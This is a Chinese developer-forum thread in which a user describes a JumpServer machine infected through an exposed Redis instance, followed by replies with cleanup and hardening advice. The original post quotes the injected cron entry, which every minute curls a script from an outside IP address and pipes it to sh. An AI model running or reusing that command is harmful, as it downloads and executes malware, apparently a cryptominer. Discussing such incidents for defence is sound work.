服务器被马了,求帮忙

2019-06-21 09:43:42 +08:00
 xiaotianhu

公司用了个 jumpserver 做跳板机,之前运维同学弄的 版本 Version 1.3.2-2

今天发现连不上了.

进去发现 redis 出了问题.redis 是本地启动的,监听内网端口 排查发现 rdb 文件写入没权限,写入目录 /etc/cron.d 这...肯定不对啊.发现写入了一个文件:

文件内容 */1 * * * * curl -fsSL http://103.35.72.209:8667/6HqJB0SPQqbFbHJD/init.sh |sh

被马无疑了.但是写入报了权限问题?这个文件怎么还写入成功了.

现在想研究一下这个马,然后对服务器得全处理一下了.头疼. 这个马怎么解 shell 玩的不好,求帮忙

9072 次点击
所在节点    程序员
49 条回复
firebroo
2019-06-21 09:59:01 +08:00
排除对方拿了权限之后是否改你 redis 启动权限,监听地址,不是的话,大概不是从 redis 进来的。
catcalse
2019-06-21 10:02:07 +08:00
中了挖矿病毒。。默哀。。
shooter556
2019-06-21 10:05:29 +08:00
先杀进程
删除相关文件
删除 crontab

监控网络连接异常

手不够快有可能需要写脚本,有些进程会 respawn 的
shooter556
2019-06-21 10:06:44 +08:00
想研究的话,不用删除,放到某个地方就行了
houzhimeng
2019-06-21 10:08:55 +08:00
挖矿,数据都在 tmp 下了,服务器上应该有 shell 脚本
xiaotianhu
2019-06-21 10:20:02 +08:00
@firebroo 那不至于用 redis 写文件来执行啊. 我怀疑是从 jumpserver 给 redis 执行命令.
xiaotianhu
2019-06-21 10:20:36 +08:00
@shooter556 docker 安全么.隔离性够用的吧
defunct9
2019-06-21 10:27:34 +08:00
开 ssh,让我上去看看
lvzhiqiang
2019-06-21 10:35:51 +08:00
那个定时任务归属那个用户的? -- 还有,重装系统吧,你不知道系统那个角落还 藏有挂马脚本。
1ffree
2019-06-21 10:40:47 +08:00
上次中招, 就把机器改成 ssh 密钥登陆了, 再没发生过
zarte
2019-06-21 10:47:07 +08:00
@Livid
已经不止一次看到#8 defunct9 回复这句话了
gaius
2019-06-21 10:53:57 +08:00
查下进程,可能还有进程会自动下载脚本跑
xiaotianhu
2019-06-21 11:06:03 +08:00
搞定了,应该是没执行成功.虚惊了
muchengxue
2019-06-21 11:12:33 +08:00
挖矿的,利用了 redis 写文件的特性,你 redis 没设置密码吧
cominghome
2019-06-21 11:14:09 +08:00
你们的跳板机居然可以从外网访问到,心也太大了吧
Livid
2019-06-21 11:37:59 +08:00
@zarte 谢谢举报。那个账号会被彻底 ban。
caryqy
2019-06-21 11:47:35 +08:00
@zarte 人家 8 楼之前是有真正给提问的上去解决问题的,既然 8 楼写出来了为什么不能认为人家是想给 lz 提供解决办法呢
@Livid
Removable
2019-06-21 11:51:38 +08:00
@Livid #15 站长再仔细调查一下吧,那个老哥我觉得应该是真的想帮忙的
Livid
2019-06-21 12:01:05 +08:00
@caryqy
@Removable

我看了那个账号的回复记录,“开 ssh,我上去看看”他以前用同样的方式回复过很多次。

你会把你们公司的服务器的 ssh 开给不认识的人吗?会有任何公司允许这种事情发生吗?

因此这种毫无意义的回复,只是在灌水而已。当灌水灌成套路的时候,这样的账号会被处理。
kangmang92
2019-06-21 13:22:07 +08:00
@xiaotianhu 如何搞定的 详细说说 我的 docker 跑的 redis 也发现了 这个 多谢

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/576076

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX